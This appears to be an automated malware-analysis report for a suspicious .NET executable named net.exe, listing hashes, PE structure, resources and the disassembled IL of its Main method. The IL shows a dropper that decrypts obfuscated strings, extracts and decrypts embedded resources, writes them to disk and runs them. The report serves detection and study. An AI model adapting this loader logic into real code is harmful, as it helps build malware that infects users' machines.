Suspicious
Suspect

9982fc296f41d48d7969be88650e3889

PE Executable | MD5: 9982fc296f41d48d7969be88650e3889 | Size: 1.16 MB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score: Medium

Hash: Hash Value
MD5: 9982fc296f41d48d7969be88650e3889
Sha1: ac3eabbe4829f78769ea6505863330f7e57bc89d
Sha256: 076bd8e03fc577eed02aab9a0b2849956286f94972f5a2334dc27e7e5df64fcd
Sha384: 223d4f38787ca6c296d6e50020d16cec5b9f9602579d65574880987efcfa14c44afe63708768d7ae30e24219d8cecda5
Sha512: 46a17402e6e66260ac9634d502ca399abac963ef49736f26af8cbe764f756e7f47e4c8e03ab4d9620ac98cc5190655c7905195d26bd8d0ab3ea5e30f4de871fc
SSDeep: 24576:eP8IyEKEw10N8qHdADdxyuUEBlqkVT9RKUJbW4xcVFvi1Av9E+:kFKEC0NSHyuVbVT9RKU84u9nV
TLSH: 404533C2CB7B7409D008357A22F742C2268875114726D92B7EEE92F8B5972775C63B3B

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET

File Structure

Structure
  DosHeader
  PE Header
  Optional Header (x86)
  Section Headers
    .text
    .rsrc
    .reloc
Resources
  RT_VERSION
    ID:0001
      ID:0
  RT_MANIFEST
    ID:0001
      ID:0
.Net Resources
  bzqwxvdswlrqgbti.Resources
    uaxxqlldtlkfvmrn
    yrhrabrvdlcevahh

Information

Name: Value
Info: PE Detect: PeReader OK (file layout)
Module Name: net.exe
Full Name: net.exe
EntryPoint: System.Void nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::Main()
Scope Name: net.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: net
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 15
Main Method: System.Void nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::Main()
Main IL Instruction Count: 115
Main IL:

ldc.i4.2 <null>
newarr System.String[]
stloc.s V_4
ldloc.s V_4
ldc.i4.0 <null>
ldc.i4.4 <null>
newarr System.String
stloc.s V_5
ldloc.s V_5
ldc.i4.0 <null>
ldstr ULVc1y945SMpuQq6vx84UQ==
stelem.ref <null>
ldloc.s V_5
ldc.i4.1 <null>
ldstr /Y7gpSBCK9MZfdb49URzDw==
stelem.ref <null>
ldloc.s V_5
ldc.i4.2 <null>
ldstr yrhrabrvdlcevahh
stelem.ref <null>
ldloc.s V_5
ldc.i4.3 <null>
ldstr LvfQWMVHsXBofEwXhFswqA==
stelem.ref <null>
ldloc.s V_5
stelem.ref <null>
ldloc.s V_4
ldc.i4.1 <null>
ldc.i4.4 <null>
newarr System.String
stloc.s V_6
ldloc.s V_6
ldc.i4.0 <null>
ldstr ULVc1y945SMpuQq6vx84UQ==
stelem.ref <null>
ldloc.s V_6
ldc.i4.1 <null>
ldstr uDrbTHnJ8hF2CITH9Cxehg==
stelem.ref <null>
ldloc.s V_6
ldc.i4.2 <null>
ldstr uaxxqlldtlkfvmrn
stelem.ref <null>
ldloc.s V_6
ldc.i4.3 <null>
ldstr LvfQWMVHsXBofEwXhFswqA==
stelem.ref <null>
ldloc.s V_6
stelem.ref <null>
ldloc.s V_4
stloc.0 <null>
ldstr bzqwxvdswlrqgbti
call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly()
newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly)
stloc.1 <null>
ldc.i4.0 <null>
stloc.2 <null>
br.s IL_00FB: ldloc.2
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.0 <null>
ldelem.ref <null>
ldstr mbHS7JoCj1V/oNtOdQjBr+ED37Cg8J+Q1UmO1RLBxCs=
call System.Boolean System.String::op_Equality(System.String,System.String)
brtrue.s IL_00A5: call System.String System.IO.Directory::GetCurrentDirectory()
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.0 <null>
ldelem.ref <null>
call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String)
call System.String System.Environment::GetEnvironmentVariable(System.String)
br.s IL_00AA: ldloc.0
call System.String System.IO.Directory::GetCurrentDirectory()
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.1 <null>
ldelem.ref <null>
call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String)
call System.String System.IO.Path::Combine(System.String,System.String)
stloc.3 <null>
ldloc.3 <null>
ldloc.1 <null>
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.2 <null>
ldelem.ref <null>
callvirt System.Object System.Resources.ResourceManager::GetObject(System.String)
castclass System.Byte[]
call System.Byte[] nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::nujbzvwnawgnvvktrymxlwdacefrtwwbhuc(System.Byte[])
call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[])
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.3 <null>
ldelem.ref <null>
call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String)
ldstr LvfQWMVHsXBofEwXhFswqA==
call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String)
call System.Boolean System.String::op_Equality(System.String,System.String)
brfalse.s IL_00F7: ldloc.2
ldloc.3 <null>
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String)
pop <null>
ldloc.2 <null>
ldc.i4.1 <null>
add <null>
stloc.2 <null>
ldloc.2 <null>
ldc.i4.2 <null>
blt.s IL_0083: ldloc.0
ret <null>

No malware configuration was found at this point.